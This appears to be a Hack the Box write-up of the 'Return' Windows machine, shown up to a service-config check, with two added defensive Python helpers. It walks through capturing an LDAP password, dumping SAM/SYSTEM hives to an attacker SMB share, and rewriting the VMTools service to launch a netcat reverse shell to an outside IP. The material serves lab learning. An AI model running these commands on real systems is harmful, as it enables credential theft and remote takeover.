Return machine, Hack the Box
The first step is to enumerate every exposed service so we know what we are up against.
┌─[root@angussmoody]─[/mnt/angussMoody/Machines/Return]
└──╼ #nmap -sS -sCV -p 53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49671,49674,49675,49679,49682,49694,52463 -oN nmap 10.10.11.108
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-19 20:26 -05
Nmap scan report for 10.10.11.108
Host is up (0.12s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: HTB Printer Admin Panel
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-05-20 01:45:19Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49675/tcp open msrpc Microsoft Windows RPC
49679/tcp open msrpc Microsoft Windows RPC
49682/tcp open msrpc Microsoft Windows RPC
49694/tcp open msrpc Microsoft Windows RPC
52463/tcp open msrpc Microsoft Windows RPC
Service Info: Host: PRINTER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 18m36s
| smb2-time:
| date: 2022-05-20T01:46:19
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 75.55 seconds
The first thing we look at is port 80, since it is running an HTTP service.
Exploring the page, we see that under Settings there is a service with a server address, a port, a username and a password.
But when we try to read the password from the page source, all it tells us is that it is stored in plain text.
Researching a bit, we came across a securicon article that describes a way to obtain user credentials when you have access to the printer's web interface.
It tells us we can leave netcat listening to capture the credentials.
So we start netcat listening on port 389, the port shown in the web interface.
┌─[root@angussmoody]─[/mnt/angussMoody/Machines/Return]
└──╼ #nc -nlvp 389
listening on [any] 389 ...
We change the Server Address to our IP and click Update.
Once we click Update, a credential arrives at our listener.
┌─[root@angussmoody]─[/mnt/angussMoody/Machines/Return]
└──╼ #nc -nlvp 389
listening on [any] 389 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.11.108] 58509
0*`%return\svc-printer�
1edFg43012!!^C
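The capture above shows why a listener on port 389 receives a usable secret: the printer performs an LDAP simple bind, which carries the DN and password as plain BER octet strings. Below is an added Python decoder (not part of the original writeup) that parses a BindRequest and flags plaintext binds; the sample packet is constructed from the fields visible in the capture (message ID 1 is assumed), and the same function can be run over LDAP payloads carved from a pcap to find devices that expose credentials this way, the exposure that LDAPS, or rejecting simple binds over cleartext LDAP, removes.

```python
"""Decode LDAP BindRequests (RFC 4511) from raw BER bytes and flag simple binds
that carry a plaintext password. Added example for this writeup; the sample
packet is constructed from the fields visible in the netcat capture."""

LDAP_MESSAGE = 0x30   # SEQUENCE wrapping every LDAPMessage
INTEGER = 0x02
OCTET_STRING = 0x04
BIND_REQUEST = 0x60   # [APPLICATION 0] constructed
SIMPLE_AUTH = 0x80    # AuthenticationChoice: simple [0] OCTET STRING


def read_tlv(buf: bytes, pos: int):
    """Return (tag, value, next_pos) for the BER element starting at buf[pos]."""
    if pos + 2 > len(buf):
        raise ValueError("truncated BER element")
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:                        # long-form length (multi-byte)
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    if pos + length > len(buf):
        raise ValueError("BER length runs past the end of the buffer")
    return tag, buf[pos:pos + length], pos + length


def decode_bind_request(packet: bytes):
    """Describe the bind in an LDAPMessage, or return None for other operations."""
    tag, msg, _ = read_tlv(packet, 0)
    if tag != LDAP_MESSAGE:
        raise ValueError("not an LDAPMessage")
    tag, msg_id, pos = read_tlv(msg, 0)
    if tag != INTEGER:
        raise ValueError("missing messageID")
    tag, op, _ = read_tlv(msg, pos)
    if tag != BIND_REQUEST:
        return None
    _, version, pos = read_tlv(op, 0)
    _, name, pos = read_tlv(op, pos)
    auth_tag, cred, _ = read_tlv(op, pos)
    simple = auth_tag == SIMPLE_AUTH
    return {
        "message_id": int.from_bytes(msg_id, "big"),
        "version": int.from_bytes(version, "big"),
        "name": name.decode("utf-8", "replace"),
        "auth": "simple" if simple else "sasl",
        # Only a simple bind puts the secret on the wire as-is; SASL credentials
        # are a nested structure, not a reusable password.
        "password": cred.decode("utf-8", "replace") if simple else None,
    }


def find_plaintext_binds(payloads):
    """Return (message_id, name, password) for each simple bind with a password."""
    hits = []
    for payload in payloads:
        bind = decode_bind_request(payload)
        if bind and bind["auth"] == "simple" and bind["password"]:
            hits.append((bind["message_id"], bind["name"], bind["password"]))
    return hits


def tlv(tag: int, value: bytes) -> bytes:
    """Encode a short-form BER element (value shorter than 128 bytes)."""
    assert len(value) < 0x80
    return bytes([tag, len(value)]) + value


# Constructed sample of what the printer sent after "Update": the bytes begin
# with 0x30 0x2A, the "0*" visible at the top of the capture. Message ID 1 is assumed.
SAMPLE_BIND = tlv(LDAP_MESSAGE,
                  tlv(INTEGER, b"\x01")
                  + tlv(BIND_REQUEST,
                        tlv(INTEGER, b"\x03")                    # LDAP v3
                        + tlv(OCTET_STRING, b"return\\svc-printer")
                        + tlv(SIMPLE_AUTH, b"1edFg43012!!")))

# Constructed UnbindRequest ([APPLICATION 2] NULL), which the detector must skip.
SAMPLE_UNBIND = tlv(LDAP_MESSAGE, tlv(INTEGER, b"\x02") + bytes([0x42, 0x00]))

if __name__ == "__main__":
    for hit in find_plaintext_binds([SAMPLE_BIND, SAMPLE_UNBIND]):
        print("plaintext simple bind:", hit)
```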
With crackmapexec we confirm that it is a valid credential for the user.
┌─[root@angussmoody]─[/mnt/angussMoody/Machines/Return]
└──╼ #crackmapexec winrm 10.10.11.108 -u svc-printer -p '1edFg43012!!'
WINRM 10.10.11.108 5985 PRINTER [*] Windows 10.0 Build 17763 (name:PRINTER) (domain:return.local)
WINRM 10.10.11.108 5985 PRINTER [*] http://10.10.11.108:5985/wsman
WINRM 10.10.11.108 5985 PRINTER [+] return.local\svc-printer:1edFg43012!! (Pwn3d!)
So we log in with evil-winrm, and with that we have the first flag, the user flag.
┌─[root@angussmoody]─[/mnt/angussMoody/Machines/Return]
└──╼ #evil-winrm -i 10.10.11.108 -u svc-printer -p '1edFg43012!!'
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-printer\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> dir
Directory: C:\Users\svc-printer\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 5/19/2022 7:56 AM 34 user.txt
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> type user.txt
08976a********************4cf015
*Evil-WinRM* PS C:\Users\svc-printer\Desktop>
We see that we can enter the Administrator's directory, but we cannot read the flag.
*Evil-WinRM* PS C:\Users\Administrator> dir
Directory: C:\Users\Administrator
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 5/20/2021 12:10 PM 3D Objects
d-r--- 5/20/2021 12:10 PM Contacts
d-r--- 9/27/2021 4:22 AM Desktop
d-r--- 5/27/2021 12:50 AM Documents
d-r--- 5/26/2021 3:00 AM Downloads
d-r--- 5/20/2021 12:10 PM Favorites
d-r--- 5/20/2021 12:10 PM Links
d-r--- 5/20/2021 12:10 PM Music
d-r--- 5/20/2021 12:10 PM Pictures
d-r--- 5/20/2021 12:10 PM Saved Games
d-r--- 5/20/2021 12:10 PM Searches
d-r--- 5/20/2021 12:10 PM Videos
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 5/19/2022 7:56 AM 34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
Access to the path 'C:\Users\Administrator\Desktop\root.txt' is denied.
At line:1 char:1
+ type root.txt
+ ~~~~~~~~~~~~~
+ CategoryInfo : PermissionDenied: (C:\Users\Administrator\Desktop\root.txt:String) [Get-Content], UnauthorizedAccessException
+ FullyQualifiedErrorId : GetContentReaderUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetContentCommand
*Evil-WinRM* PS C:\Users\Administrator\Desktop>
We move to a directory such as Documents to upload winPEAS and run it to see what information it gives us.
*Evil-WinRM* PS C:\Users\svc-printer\Documents> upload /mnt/angussMoody/Scripts/Windows/winPEASx64.exe .
Info: Uploading /mnt/angussMoody/Scripts/Windows/winPEASx64.exe to .
Data: 2581844 bytes of 2581844 bytes copied
Info: Upload successful!
We run the tool
*Evil-WinRM* PS C:\Users\svc-printer\Documents> .\winPEASx64.exe
ANSI color bit for Windows is not set. If you are execcuting this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
*Evil-WinRM* PS C:\Users\svc-printer\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
================== =============================================
return\svc-printer S-1-5-21-3750359090-2939318659-876128439-1103
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Print Operators Alias S-1-5-32-550 Mandatory group, Enabled by default, Enabled group
BUILTIN\Server Operators Alias S-1-5-32-549 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= =================================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemtimePrivilege Change the system time Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\Users\svc-printer\Documents> cd c:\
*Evil-WinRM* PS C:\> dir
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 5/20/2021 7:19 AM inetpub
d----- 9/15/2018 12:19 AM PerfLogs
d-r--- 9/27/2021 4:46 AM Program Files
d----- 5/26/2021 2:57 AM Program Files (x86)
d-r--- 5/26/2021 1:51 AM Users
d----- 9/27/2021 4:49 AM Windows
*Evil-WinRM* PS C:\> mkdir Temp
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 5/19/2022 9:18 PM Temp
*Evil-WinRM* PS C:\> cd Temp
*Evil-WinRM* PS C:\Temp> dir
*Evil-WinRM* PS C:\Temp> reg save hklm\sam c:\Temp\sam
The operation completed successfully.
*Evil-WinRM* PS C:\Temp> reg save hklm\system c:\Temp\system
The operation completed successfully.
*Evil-WinRM* PS C:\Temp> dir
Directory: C:\Temp
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/19/2022 9:19 PM 49152 sam
-a---- 5/19/2022 9:19 PM 15925248 system
*Evil-WinRM* PS C:\Temp> download sam
Info: Downloading sam to ./sam
Info: Download successful!
*Evil-WinRM* PS C:\Temp> download system
Info: Downloading system to ./system
Info: Download successful!
Among all the information it returns, we see that this user holds several privileges, including:
*Evil-WinRM* PS C:\Users\svc-printer\Documents> whoami /all
USER INFORMATION
----------------
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= =================================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemtimePrivilege Change the system time Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
Browsing a bit more, we find this hackingarticles article, which explains that with this privilege (SeBackupPrivilege) we can copy files, so we can copy the SAM and SYSTEM hives and dump them on our attacking machine.
We follow the steps from the article and see that we now have these files in our directory.
*Evil-WinRM* PS C:\Temp> reg save hklm\sam c:\Temp\sam
The operation completed successfully.
*Evil-WinRM* PS C:\Temp> reg save hklm\system c:\Temp\system
The operation completed successfully.
*Evil-WinRM* PS C:\Temp> dir
Directory: C:\Temp
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/19/2022 9:54 PM 49152 sam
-a---- 5/19/2022 9:54 PM 16023552 system
*Evil-WinRM* PS C:\Temp>
Now we download them. I tried using download directly, but it does not retrieve them, so we do it with impacket's smbserver.
*Evil-WinRM* PS C:\Temp> clear
*Evil-WinRM* PS C:\Temp> copy sam \\10.10.14.4\Folder\sam
*Evil-WinRM* PS C:\Temp> copy system \\10.10.14.4\Folder\system
*Evil-WinRM* PS C:\Temp>
-----------------------------------------------------------------------------------------------------------------------------------------------
┌─[root@angussmoody]─[/mnt/angussMoody/Machines/Return]
└──╼ #impacket-smbserver Folder . -smb2support
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.11.108,49423)
[*] AUTHENTICATE_MESSAGE (\,PRINTER)
[*] User PRINTER\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
[*] Connecting Share(1:IPC$)
[*] Connecting Share(2:Folder)
[*] Disconnecting Share(1:IPC$)
[*] Disconnecting Share(2:Folder)
[*] Closing down connection (10.10.11.108,49423)
[*] Remaining connections []
We now have these files on our machine.
┌─[root@angussmoody]─[/mnt/angussMoody/Machines/Return]
└──╼ #ll sam system
Permissions Size User Date Modified Name
.rwxrwxrwx 49k angussmoody 19 may 23:54 sam
.rwxrwxrwx 16M angussmoody 19 may 23:54 system
Now we dump them with the samdump2 tool.
┌─[root@angussmoody]─[/mnt/angussMoody/Machines/Return]
└──╼ #samdump2 -h
samdump2 3.0.0 by Objectif Securite (http://www.objectif-securite.ch)
original author: ncuomo@studenti.unina.it
Usage: samdump2 [OPTION]... SYSTEM_FILE SAM_FILE
Retrieves syskey and extract hashes from Windows 2k/NT/XP/Vista SAM
-d enable debugging
-h display this information
-o file write output to file
and it gives us the users' hashes.
┌─[✗]─[root@angussmoody]─[/mnt/angussMoody/Machines/Return]
└──╼ #samdump2 -d system sam
Root Key : ROOT
Default ControlSet: 001
********* ROOT\ControlSet001\Control\Lsa\JD *********
n->classname_len = 16 b = ed616c
********* ROOT\ControlSet001\Control\Lsa\Skew1 *********
n->classname_len = 16 b = ed66cc
********* ROOT\ControlSet001\Control\Lsa\GBG *********
n->classname_len = 16 b = ed5fdc
********* ROOT\ControlSet001\Control\Lsa\Data *********
n->classname_len = 16 b = ed5e34
Bootkey unsorted: cdf62c6714d022899a69dba4c34e35c8
Root Key : ROOT
******************** 1 ********************
keyname = ROOT\SAM\Domains\Account\Users\000001F4
disabled = 0
username len=13, off=1c0
lm_hashoffset = 250, lm_size = 18
nt_hashoffset = 268, nt_size = 38
******************** 2 ********************
keyname = ROOT\SAM\Domains\Account\Users\000001F5
disabled = 1
username len=5, off=1b4
lm_hashoffset = 238, lm_size = 18
nt_hashoffset = 250, nt_size = 18
******************** 3 ********************
keyname = ROOT\SAM\Domains\Account\Users\000001F7
disabled = 1
username len=14, off=d8
lm_hashoffset = 248, lm_size = 18
nt_hashoffset = 260, nt_size = 18
******************** 4 ********************
keyname = ROOT\SAM\Domains\Account\Users\000001F8
disabled = 1
username len=18, off=d0
lm_hashoffset = 1fc, lm_size = 0
nt_hashoffset = 1fc, nt_size = 0
******************** -1 ********************
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* :503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* ä:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
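The hashes above also explain the failed logins that follow: 31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of an empty password, and the local SAM of a domain controller holds only local accounts, not the domain Administrator, whose secret is in NTDS.dit. The added Python check below (not from the writeup) computes that value and parses samdump2's pwdump-style lines to flag accounts whose hash equals it; the same parser serves as an audit helper for empty-password and disabled accounts in any pwdump file. MD4 is implemented inline because OpenSSL 3 builds of hashlib often no longer provide it, and the sample lines are taken from the output above (the two garbled usernames are left out).

```python
"""Parse pwdump-style lines (user:rid:lm:nt:::) and flag hashes that equal the
empty-password values. Added example for this writeup, not part of it."""
import struct

MASK = 0xFFFFFFFF
# LM hash of an empty password: DES of a fixed constant under two all-zero keys.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"


def _lrot(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 (hashlib may lack it on OpenSSL 3 systems)."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg.append(0)
    msg += struct.pack("<Q", len(data) * 8)           # bit length, little-endian
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    r3_order = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(msg), 64):
        w = struct.unpack("<16I", msg[off:off + 64])
        a0, b0, c0, d0 = a, b, c, d
        for i in range(16):                           # round 1
            a = _lrot((a + f(b, c, d) + w[i]) & MASK, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                           # round 2
            k = (i % 4) * 4 + i // 4
            a = _lrot((a + g(b, c, d) + w[k] + 0x5A827999) & MASK, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                           # round 3
            a = _lrot((a + h(b, c, d) + w[r3_order[i]] + 0x6ED9EBA1) & MASK, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a, b, c, d = (a + a0) & MASK, (b + b0) & MASK, (c + c0) & MASK, (d + d0) & MASK
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> str:
    """NT hash = MD4 over the UTF-16LE encoding of the password."""
    return md4(password.encode("utf-16-le")).hex()


EMPTY_NT = nt_hash("")    # 31d6cfe0d16ae931b73c59d7e0c089c0


def parse_pwdump(lines):
    """Return one record per pwdump line with empty-hash and disabled flags."""
    records = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        disabled = line.startswith("*disabled*")
        if disabled:
            line = line[len("*disabled*"):].strip()
        user, rid, lm, nt = line.split(":")[:4]
        records.append({
            "user": user, "rid": int(rid), "disabled": disabled,
            "empty_lm": lm.lower() == EMPTY_LM,
            "empty_nt": nt.lower() == EMPTY_NT,
        })
    return records


def accounts_with_empty_password(lines):
    """Names of enabled accounts whose NT hash is the empty-password hash."""
    return [r["user"] for r in parse_pwdump(lines)
            if r["empty_nt"] and not r["disabled"]]


# Constructed from the samdump2 output in this writeup.
SAMDUMP_LINES = [
    "Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
    "*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
]

if __name__ == "__main__":
    print("empty-password accounts:", accounts_with_empty_password(SAMDUMP_LINES))
```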
But when we try to connect with evil-winrm, we get an error. This is expected: 31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of an empty password, and on a domain controller the local SAM only contains local accounts, not the domain Administrator (domain credentials live in NTDS.dit), so this hash cannot be used to authenticate to the domain.
┌─[root@angussmoody]─[/mnt/angussMoody/Machines/Return]
└──╼ #evil-winrm -i 10.10.11.108 -u Administrator -H '31d6cfe0d16ae931b73c59d7e0c089c0'
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1
With wmiexec we also get an error.
┌─[✗]─[root@angussmoody]─[/mnt/angussMoody/Machines/Return]
└──╼ #wmiexec.py return.local/Administrator@10.10.11.108 -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[-] SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
The same happens with psexec.
┌─[✗]─[root@angussmoody]─[/mnt/angussMoody/Machines/Return]
└──╼ #psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -target-ip 10.10.11.108 administrator@10.10.11.108
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[-] SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
We keep enumerating. With whoami /all we already saw the groups we belong to; we can also list them with whoami /groups, and we see that we belong to the Print Operators and Server Operators groups.
*Evil-WinRM* PS C:\Users\svc-printer\Documents> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Print Operators Alias S-1-5-32-550 Mandatory group, Enabled by default, Enabled group
BUILTIN\Server Operators Alias S-1-5-32-549 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
Reviewing these groups in this article, for Server Operators it tells us that we can: log on to a server interactively, create and delete network shares, start and stop services, back up and restore files, format the computer's hard disk drive, and shut down the computer.
With the sc.exe tool we can create a service or modify one that is already present on the system. We will try to create a service that launches nc.exe to get a reverse shell to our machine: we move to the Temp directory, where we have full permissions, upload nc.exe and use that location as the service's binary path.
*Evil-WinRM* PS C:\Users\svc-printer\Documents> cd c:\Windows\Temp
*Evil-WinRM* PS C:\Windows\Temp> upload /mnt/angussMoody/Scripts/Windows/nc64.exe
Info: Uploading /mnt/angussMoody/Scripts/Windows/nc64.exe to C:\Windows\Temp\nc64.exe
Data: 60360 bytes of 60360 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Windows\Temp>
Listing the directory we see a lot of VMware files and our nc64.exe.
*Evil-WinRM* PS C:\Windows\Temp> dir
Directory: C:\Windows\Temp
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 8/8/2022 4:25 PM DiagTrack_alternativeTrace
d----- 8/8/2022 4:25 PM DiagTrack_aot
d----- 8/8/2022 4:25 PM DiagTrack_diag
d----- 8/8/2022 4:25 PM DiagTrack_miniTrace
d----- 9/27/2021 6:04 AM vmware-SYSTEM
-a---- 8/8/2022 6:27 PM 45272 nc64.exe
-a---- 8/8/2022 4:26 PM 102 silconfig.log
-a---- 9/27/2021 5:59 AM 206 temBC3F.tmp
-a---- 9/27/2021 6:14 AM 13692 vmware-vmsvc-SYSTEM.log
-a---- 9/27/2021 4:46 AM 52365 vmware-vmsvc.log
-a---- 9/27/2021 6:05 AM 297 vmware-vmtoolsd-Administrator.log
-a---- 8/8/2022 4:25 PM 396 vmware-vmtoolsd-SYSTEM.log
-a---- 9/27/2021 6:14 AM 3984 vmware-vmusr-Administrator.log
-a---- 9/27/2021 4:46 AM 12982 vmware-vmusr.log
-a---- 8/8/2022 4:25 PM 288 vmware-vmvss-SYSTEM.log
-a---- 9/27/2021 4:43 AM 2016 vmware-vmvss.log
*Evil-WinRM* PS C:\Windows\Temp>
With our binary uploaded, we try to create a service with its path set to our binary, but even though we are in the group we do not have permission to create a service.
*Evil-WinRM* PS C:\Windows\Temp> sc.exe create shell_reverse binPath="C:\Windows\Temp\nc64.exe -e cmd 10.10.14.18 443"
[SC] OpenSCManager FAILED 5:
Access is denied.
Since we cannot create a service, we will try to modify one that already exists on the system, as the sc.exe article suggests.
First we need to see which services are running on the system. There are several, and we will try to modify one of them with our payload.
*Evil-WinRM* PS C:\Windows\Temp> services
Path Privileges Service
---- ---------- -------
C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe True ADWS
\??\C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{5533AFC7-64B3-4F6E-B453-E35320B35716}\MpKslDrv.sys True MpKslceeb2796
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe True NetTcpPortSharing
C:\Windows\SysWow64\perfhost.exe True PerfHost
"C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe" False Sense
C:\Windows\servicing\TrustedInstaller.exe False TrustedInstaller
"C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe" True VGAuthService
"C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" True VMTools
"C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2104.14-0\NisSrv.exe" True WdNisSvc
"C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2104.14-0\MsMpEng.exe" True WinDefend
"C:\Program Files\Windows Media Player\wmpnetwk.exe" False WMPNetworkSvc
*Evil-WinRM* PS C:\Windows\Temp>
After trying several services, we find that we can make the modification on the VMTools service.
*Evil-WinRM* PS C:\Windows\Temp> sc.exe config WMPNetworkSvc binPath="C:\Windows\Temp\nc64.exe -e cmd 10.10.14.18 443"
[SC] OpenService FAILED 5:
Access is denied.
*Evil-WinRM* PS C:\Windows\Temp> sc.exe config WinDefend binPath="C:\Windows\Temp\nc64.exe -e cmd 10.10.14.18 443"
[SC] OpenService FAILED 5:
Access is denied.
*Evil-WinRM* PS C:\Windows\Temp> sc.exe config WdNisSvc binPath="C:\Windows\Temp\nc64.exe -e cmd 10.10.14.18 443"
[SC] OpenService FAILED 5:
Access is denied.
*Evil-WinRM* PS C:\Windows\Temp> sc.exe config VMTools binPath="C:\Windows\Temp\nc64.exe -e cmd 10.10.14.18 443"
[SC] ChangeServiceConfig SUCCESS
Now we need to restart the service: stop it with the stop command and start it again with start. But first, with the qc command, we can check that the change was applied, and we see our payload in BINARY_PATH_NAME.
*Evil-WinRM* PS C:\Windows\Temp> sc.exe qc VMTools
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: VMTools
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
